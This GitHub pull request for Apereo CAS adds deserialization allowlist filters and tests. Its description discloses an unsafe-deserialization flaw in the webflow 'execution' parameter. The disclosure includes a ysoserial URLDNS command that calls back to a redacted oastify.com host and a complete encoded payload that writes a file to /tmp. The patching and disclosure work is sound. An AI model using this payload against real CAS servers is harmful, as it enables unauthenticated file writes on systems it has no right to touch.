### PR TITLE
Prevent arbitrary unserialize with non-default option

### DIFF
--- a/core/cas-server-core-util-api/src/main/java/org/apereo/cas/util/serialization/SerializationUtils.java
+++ b/core/cas-server-core-util-api/src/main/java/org/apereo/cas/util/serialization/SerializationUtils.java
@@ -23,6 +23,27 @@ import org.jooq.lambda.Unchecked;
 public class SerializationUtils {
 
     /**
+     * Restricts {@link #deserialize(InputStream, Class)} to the classes CAS and pac4j
+     * actually put on the wire here (tickets, pubsub commands, SAML/OIDC request contexts,
+     * browser-storage session attributes), rejecting everything else by default. This stops
+     * known deserialization gadget chains (e.g. commons-collections, AspectJ weaver) from
+     * being instantiated during {@code readObject()}, even when the {@link DecodableCipher}
+     * guarding this stream is a no-op or otherwise fails to reject tampered input (for example,
+     * {@code cas.webflow.crypto.enabled=false} or {@link org.apereo.cas.util.crypto.CipherExecutor#noOp()}).
+     */
+    private static final ObjectInputFilter DECODE_FILTER = ObjectInputFilter.Config.createFilter(
+        "maxdepth=64;maxrefs=10000;maxbytes=10485760;maxarray=100000;"
+            + "org.apereo.cas.**;"
+            + "org.pac4j.**;"
+            + "java.lang.*;"
+            + "java.util.*;"
+            + "java.util.concurrent.*;"
+            + "java.util.concurrent.atomic.*;"
+            + "java.time.*;"
+            + "java.math.*;"
+            + "!*");
+
+    /**
      * Serialize as base64 .
      *
      * @param object the object
@@ -94,6 +115,7 @@ public class SerializationUtils {
     public static <T> T deserialize(final InputStream inputStream, final Class<T> clazz) {
         return Unchecked.supplier(() -> {
             try (val in = new ObjectInputStream(inputStream)) {
+                in.setObjectInputFilter(DECODE_FILTER);
                 val obj = in.readObject();
 
                 if (!clazz.isAssignableFrom(obj.getClass())) {

--- a/core/cas-server-core-util-api/src/test/java/org/apereo/cas/util/serialization/SerializationUtilsTests.java
+++ b/core/cas-server-core-util-api/src/test/java/org/apereo/cas/util/serialization/SerializationUtilsTests.java
@@ -1,6 +1,7 @@
 package org.apereo.cas.util.serialization;
 
 import module java.base;
+import org.apereo.cas.util.crypto.CipherExecutor;
 import lombok.val;
 import org.junit.jupiter.api.Tag;
 import org.junit.jupiter.api.Test;
@@ -26,6 +27,42 @@ class SerializationUtilsTests {
         assertEquals(100, SerializationUtils.deserialize(result, Integer.class));
         assertEquals(100, SerializationUtils.deserializeAndCheckObject(result, Number.class));
         assertEquals(100, SerializationUtils.deserialize(result, Number.class));
+    }
+
+    @Test
+    void verifyDeserializationFilterRejectsDisallowedClasses() throws Exception {
+        val serialized = SerializationUtils.serialize(new URL("https://apereo.org"));
+        val cipher = CipherExecutor.noOp();
+        val thrown = assertThrows(UncheckedIOException.class,
+            () -> SerializationUtils.decodeAndDeserializeObject(serialized, cipher, Serializable.class));
+        assertInstanceOf(InvalidClassException.class, thrown.getCause());
+    }
+
+    @Test
+    void verifyDeserializationFilterPermitsAllowedClasses() {
+        val attributes = new LinkedHashMap<String, Object>();
+        attributes.put("username", "casuser");
+        attributes.put("loginTime", 1234567890L);
+        attributes.put("remembered", Boolean.TRUE);
+
+        val cipher = CipherExecutor.noOp();
+        val encoded = SerializationUtils.serializeAndEncodeObject(cipher, attributes);
+        val result = SerializationUtils.decodeAndDeserializeObject(encoded, cipher, Serializable.class);
+        assertEquals(attributes, result);
+
+        val casType = new TestCasDomainObject("casuser");
+        val encodedCasType = SerializationUtils.serializeAndEncodeObject(cipher, casType);
+        assertEquals(casType, SerializationUtils.decodeAndDeserializeObject(encodedCasType, cipher, Serializable.class));
+    }
+
+    /**
+     * Stands in for a real {@code org.apereo.cas.**} domain object (e.g. a ticket
+     * or authentication context) to verify the deserialization filter permits
+     * this module's own types without pulling in another module as a test dependency.
+     *
+     * @param principal the principal
+     */
+    private record TestCasDomainObject(String principal) implements Serializable {
     }
 
 }

--- a/core/cas-server-core-webflow-api/src/main/java/org/apereo/cas/web/flow/executor/EncryptedTranscoder.java
+++ b/core/cas-server-core-webflow-api/src/main/java/org/apereo/cas/web/flow/executor/EncryptedTranscoder.java
@@ -34,6 +34,7 @@ public class EncryptedTranscoder implements Transcoder {
     private static final ObjectInputFilter DECODE_FILTER = ObjectInputFilter.Config.createFilter(
         "maxdepth=64;maxrefs=10000;maxbytes=10485760;maxarray=100000;"
             + "org.apereo.cas.**;"
+            + "org.apereo.inspektr.**;"
             + "org.springframework.webflow.**;"
             + "org.springframework.binding.**;"
             + "java.lang.*;"

--- a/core/cas-server-core-webflow-api/src/main/java/org/apereo/cas/web/flow/executor/EncryptedTranscoder.java
+++ b/core/cas-server-core-webflow-api/src/main/java/org/apereo/cas/web/flow/executor/EncryptedTranscoder.java
@@ -24,6 +24,27 @@ import org.springframework.aop.support.AopUtils;
 @RequiredArgsConstructor
 public class EncryptedTranscoder implements Transcoder {
     /**
+     * Restricts {@link #decode(byte[])} to the classes CAS and Spring Webflow
+     * actually place into flow-execution/conversation state, rejecting everything
+     * else by default. This stops known deserialization gadget chains (e.g.
+     * commons-collections, AspectJ weaver) from being instantiated during
+     * {@code readObject()} even if the cipher key protecting this stream is ever
+     * misconfigured, leaked, or brute-forced.
+     */
+    private static final ObjectInputFilter DECODE_FILTER = ObjectInputFilter.Config.createFilter(
+        "maxdepth=64;maxrefs=10000;maxbytes=10485760;maxarray=100000;"
+            + "org.apereo.cas.**;"
+            + "org.springframework.webflow.**;"
+            + "org.springframework.binding.**;"
+            + "java.lang.*;"
+            + "java.util.*;"
+            + "java.util.concurrent.*;"
+            + "java.util.concurrent.atomic.*;"
+            + "java.time.*;"
+            + "java.math.*;"
+            + "!*");
+
+    /**
      * Handles encryption/decryption details.
      */
     private final CipherExecutor cipherExecutor;
@@ -64,6 +85,7 @@ public class EncryptedTranscoder implements Transcoder {
              val in = this.compression
                  ? new ObjectInputStream(new GZIPInputStream(inBuffer))
                  : new ObjectInputStream(inBuffer)) {
+            in.setObjectInputFilter(DECODE_FILTER);
             return in.readObject();
         } catch (final Exception e) {
             LoggingUtils.error(LOGGER, e);

--- a/core/cas-server-core-webflow/src/test/java/org/apereo/cas/web/flow/executor/EncryptedTranscoderTests.java
+++ b/core/cas-server-core-webflow/src/test/java/org/apereo/cas/web/flow/executor/EncryptedTranscoderTests.java
@@ -23,12 +23,17 @@ class EncryptedTranscoderTests extends BaseWebflowConfigurerTests {
     @ValueSource(booleans = {true, false})
     void verifyEncodeDecode(final boolean compression) throws Exception {
         val transcoder1 = new EncryptedTranscoder(webflowCipherExecutor, compression);
-        val encodable = new URI("https://maps.google.com/maps?f=q&source=s_q&hl=en&geocode=&"
+        // A plain String stands in for real flow-execution/conversation state here (which is
+        // always org.apereo.cas.**, Spring Webflow types, or plain JDK value types -- never a
+        // java.net.URL/URI). Deliberately not java.net.URL: it's the exact payload class used by
+        // the well-known "URLDNS" Java deserialization gadget, so it is intentionally excluded
+        // from EncryptedTranscoder's ObjectInputFilter allowlist.
+        val encodable = "https://maps.google.com/maps?f=q&source=s_q&hl=en&geocode=&"
             + "q=1600+Pennsylvania+Avenue+Northwest+Washington,+DC+20500&aq=&"
             + "sll=38.897678,-77.036517&sspn=0.00835,0.007939&vpsrc=6&t=w&"
             + "g=1600+Pennsylvania+Avenue+Northwest+Washington,+DC+20500&ie=UTF8&hq=&"
             + "hnear=1600+Pennsylvania+Ave+NW,+Washington,+District+of+Columbia,+20500&"
-            + "ll=38.898521,-77.036517&spn=0.00835,0.007939&z=17&iwloc=A").toURL();
+            + "ll=38.898521,-77.036517&spn=0.00835,0.007939&z=17&iwloc=A";
         val encoded = transcoder1.encode(encodable);
         assertEquals(encodable, transcoder1.decode(encoded));
     }


### PR DESCRIPTION
# Checklist

- [x] **Brief description of changes applied**
- [x] **Test cases for all modified changes** : see "Test coverage" below; all pass.
- [x] **Test cases to demonstrate the problem before the fix** : see "Technical detail" below
- [x] **The same pull request targeted at the master branch, if applicable** 
- [x] **Documentation on how to configure, test, etc** : see "Technical detail" below
- [x] **Possible limitations, side effects, performance issues** : see "Limitations & side effects" below.
- [x] **Reference any other pull requests that might be related** : no pull request identified that match this issue.

## Summary

Those changes adds a class-allowlist `ObjectInputFilter` to `SerializationUtils` (`cas/core/cas-server-core-util-api/src/main/java/org/apereo/cas/util/serialization/SerializationUtils.java`) and `EncryptedTranscoder` (`cas/core/cas-server-core-webflow-api/src/main/java/org/apereo/cas/web/flow/executor/EncryptedTranscoder.java`).

Without this changes, if an CAS administrator set `cas.webflow.crypto.enabled` and `cas.webflow.crypto.signing-enabled` options to `false` or use a weak crypto key that allow an attacker to edit serialized data, it leads to at least unauthenticated arbitrary file write and potentially other unwanted actions. This behavior is **not the default after a fresh install** 

Why this isn't report to cas-appsec-private@apereo.org like a security issue should do ?

It have been report, with a document describing in detail the vulnerabilty, and the response was as follows :

<img width="1205" height="436" alt="response_from_appsec" src="https://github.com/user-attachments/assets/b443fec0-74f2-43b1-b41e-da988dbefe91" />

## Technical detail

The vulnerability concerns the *webflow* security. During authentication, on the `/cas/login` endpoint, the `execution` parameter is transmitted along with the `username` and `password` parameters. It have been observed on cas dev branch (8.0.0.0-Snapshot) but also on the 7.3.7.x to 7.3.7.3 version.

By default, the `cas.webflow.crypto.enabled` and `cas.webflow.crypto.signing-enabled` options are set to `true`, which ensures the integrity and confidentiality of the authentication sequence.

If these 2 options are set to `false`, or if the encryption/signing keys are weak, it becomes possible to edit this `execution` parameter. Although this degrades security, it is a possible configuration for the CAS server.

What is unexpected is the possibility of manipulating the transmitted data in order to execute other actions when the `execution` parameter is processed.

In the `EncryptedTranscoder` class of the file `apereo-cas-7.3.7/cas/core/cas-server-core-webflow-api/src/main/java/org/apereo/cas/web/flow/executor/EncryptedTranscoder.java`, the `decode` method decompresses and then deserializes the received bytes:

```java
    @Override
    @SuppressWarnings("BanSerializableRead")
    public Object decode(final byte[] encoded) throws IOException {
        val data = decrypt(encoded);
        try (val inBuffer = new ByteArrayInputStream(data);
             val in = this.compression
                 ? new ObjectInputStream(new GZIPInputStream(inBuffer))
                 : new ObjectInputStream(inBuffer)) {
            return in.readObject();
        } catch (final Exception e) {
            LoggingUtils.error(LOGGER, e);
            throw new IOException("Deserialization error", e);
        }
    }
```

If we reconstruct where this function is called, the following steps are involved:

```java
// apereo-cas-7.3.7/cas/core/cas-server-core-webflow-api/src/main/java/org/apereo/cas/web/flow/executor/ClientFlowExecutionRepository.java
// line 130
    protected Transcoder determineTranscoder() {
        val clientInfo = Objects.requireNonNull(ClientInfoHolder.getClientInfo(), "Client info cannot be null");
        val cipherExecutor = cipherExecutorResolver.resolve(clientInfo.getTenant());
        return new EncryptedTranscoder(cipherExecutor);
    }
```

```java
// apereo-cas-7.3.7/cas/core/cas-server-core-webflow-api/src/main/java/org/apereo/cas/web/flow/executor/ClientFlowExecutionRepository.java
// line 78
    @Override
    public FlowExecution getFlowExecution(final FlowExecutionKey key) throws FlowExecutionRepositoryException {
        if (key instanceof final ClientFlowExecutionKey clientFlowExecutionKey) {
            try {
                val encoded = clientFlowExecutionKey.getData();
                val state = (SerializedFlowExecutionState) determineTranscoder().decode(encoded);
...
            }
        }
        throw new IllegalArgumentException("Expected instance of ClientFlowExecutionKey but got " + key.getClass().getName());
    }
```

The execution key has the format <UUID>_<base64-encoded-encrypted-or-not-flow-state>. The *flow state* is the serialized class, which can be modified. For the proof of concept, a simple DNS request to `[Redacted].oastify.com` will be performed.

The PoC is carried out with [ysoserial](https://github.com/frohoff/ysoserial):

```bash
$ sudo docker run --rm -v ./ysoserial-all.jar:/ysoserial-all.jar eclipse-temurin:8-jdk java -jar /ysoserial-all.jar URLDNS "http://poc.[REDACTED].oastify.com" > yso_dns.bin
```

After encoding the payload to the right format and sending the edited `execution` parameter, an URL callback is received :

<img width="1176" height="410" alt="DNS_callback" src="https://github.com/user-attachments/assets/5c39a02e-4713-4525-a5db-9a25622022b6" />

Arbitrary file write have also been acheived, a file on  `/tmp/write1` containing `test1` is written when submitting the following payload to the `execution` parameter :

```
ffffffff-ffff-ffff-ffff-ffffffffffff_H4sIANAQRWoC/4WSz2sTQRTHX2Zp%2BoOIrRQ9iSCeRGYo9CKBaq0WKyuCyUHw4jSZJBtnd8aZl2TiwYMgiCeR6EVQ/4AqelK8Ff8CPepFkB49eenRN0mFSg9dlt03O9/9fL/Me1u/Yco7WOjKvuQ9zDS/Kn2npvDz5UfPX3z6uJwABDuoAAC7cBHiVSL9snFtLq1sdBRvmDw3hae31qqBWazvqmFf6p7i9Uw1r0t7pUA3fPL228vz26d%2BMGApJCRBOJZGY6Fl0RY3Nrv0e5W2cmkRjk62YiZBhGqgb6e54AduzK0YuAzVEseAFO7sIeEIz1N5f0jUYmf08NVwfpRAKYXplmygcRTrXEoIMUGIPYTYhxB1JwvfMi5XjoKRZ/UQz1aviGzP12iFssB9hFv9pwur7MOIxRCz2T/FPXgASbA9B%2Bz2pa0/J3bLM/WfLLaDmlBG5XFpjpxXxs7eklOXD5TsK8fRGE3%2B4zS1LLdarcX6TI0iKLk5WWZFm07g/a/dd28Wd54xSK7BnJYex6LmBlQ8FSSqZ5QxhXLL6KZy//eshlFRDQcmiMhT09%2B3vxy/8zUBtk5kI5vr4/PdgFnsOOU7xAt2b6hgMEOP%2BVgFGrHXJ4/cfEx1BaHEQ/gL6N8O4KYCAAA%3D
```

Finally, the same lack of verification on input is observed on `SerializationUtils` class. The same misconfigurations on crypto options are mandatories and also the non-default option `cas.authn.saml-idp.core.session-storage-type=BROWSER_STORAGE` for `saml-idp` module need to be enable. 

The vulnerability could applied, when calling the method `buildFromTrackableSession` from the class `BrowserWebStorageSessionStore`. The exploitation is more challenging but we patch the `SerializationUtils` class in order to avoid it.

## Test coverage

Run via CAS's category-tagged test tasks (the plain `test` task is disabled project-wide; use `./gradlew -p <module> test<Category>`, e.g. `testUtility` / `testWebflow`).

1. `core/cas-server-core-util-api/src/test/java/org/apereo/cas/util/serialization/SerializationUtilsTests.java` (`testUtility`) — added:
- `verifyDeserializationFilterRejectsDisallowedClasses` — serializes a `java.net.URL` and asserts `decodeAndDeserializeObject(..., CipherExecutor.noOp(), ...)` throws `UncheckedIOException` caused by `InvalidClassException: filter status: REJECTED`. Fails without the filter (proves the problem existed); passes with it.
- `verifyDeserializationFilterPermitsAllowedClasses` — round-trips a `LinkedHashMap<String,Object>` of plain JDK values, and a small `org.apereo.cas.**`-namespaced record, through `serializeAndEncodeObject`/`decodeAndDeserializeObject` with `CipherExecutor.noOp()`; asserts both succeed unchanged. Confirms the filter doesn't break legitimate callers.

Result: `3 tests completed, 0 failed` for this class (`verifyOperation`, the two above).

2. `core/cas-server-core-webflow/src/test/java/org/apereo/cas/web/flow/executor/EncryptedTranscoderTests.java` (`testWebflow`) — fixed `verifyEncodeDecode` (see above); all 5 tests in the class now pass (`verifyEncodeDecode` × 2 parameterizations, `verifyBadEncoding`, `verifyNotSerializable`, `verifyBadDecoding`). I remove in the test the `.toURL()` because the payload used to confirm the presence of the vulnerability is exactly using the reference to `java.net.URL`

## Limitations & side effects

- The allowlist is intentionally coarse (`org.apereo.cas.**`, `org.pac4j.**`, common JDK types) rather than scoped per call site, because `SerializationUtils` is a shared utility with six distinct callers and no per-caller context to narrow against without a larger API change. If a future caller needs to place an object from a different package (e.g. a third-party library type) into one of the affected object graphs, deserializing it will start failing and the filter pattern will need to be extended alongside that change — as happened here with `org.apereo.inspektr.**`, and as deliberately did *not* happen with `java.net.*` (see `EncryptedTranscoderTests` above).
- No measurable performance impact is expected: the filter is built once into a `static final` field, and per-object pattern matching is O(1) relative to the cost of reflection-based deserialization itself.
- The `EncryptedTranscoder` change is a strict widening of an existing allowlist (adding one trusted, server-only package) — no new risk is introduced.